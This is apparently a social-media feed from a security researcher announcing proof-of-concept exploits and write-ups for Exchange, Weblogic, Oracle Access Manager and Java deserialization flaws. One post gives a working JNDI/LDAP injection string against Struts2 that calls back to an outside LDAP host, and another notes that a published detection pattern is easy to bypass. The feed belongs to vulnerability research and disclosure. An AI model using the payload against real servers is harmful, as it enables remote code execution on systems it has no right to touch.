Janggggg
1,124 posts
- You guys must be waiting for this, So this is the working PoC script of the Exchange 0day exploited ITW
- As many ppl requested, Here is the PoC of CVE-2021-42321, Exchange Post-Auth RCE This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event
- I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482)
- Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
- Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting!
- Lol The URL pattern to detect/prevent the Exchange 0day provided in MSRC's blog post can easily be bypassed @GossiTheDog
- Struts2 RCE PoC/IoC: /$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ Disclaimer: This isn't an 0day, It has already been mentioned as vulnerable in many Chinese blog post youtube.com/watch?v=D-TwQR… *this really reminds me of SpEL injection
- As promised, Here is the detail and a part of PoC about the OAM Pre-Auth RCE (CVE-2021-35587) It may require more work to get fully functional PoC, Have fun with it! cc @peterjson
- I just published The Art of Deserialization Gadget Hunting [part 3] (How I found CVE-2020–2555 by known tools!)
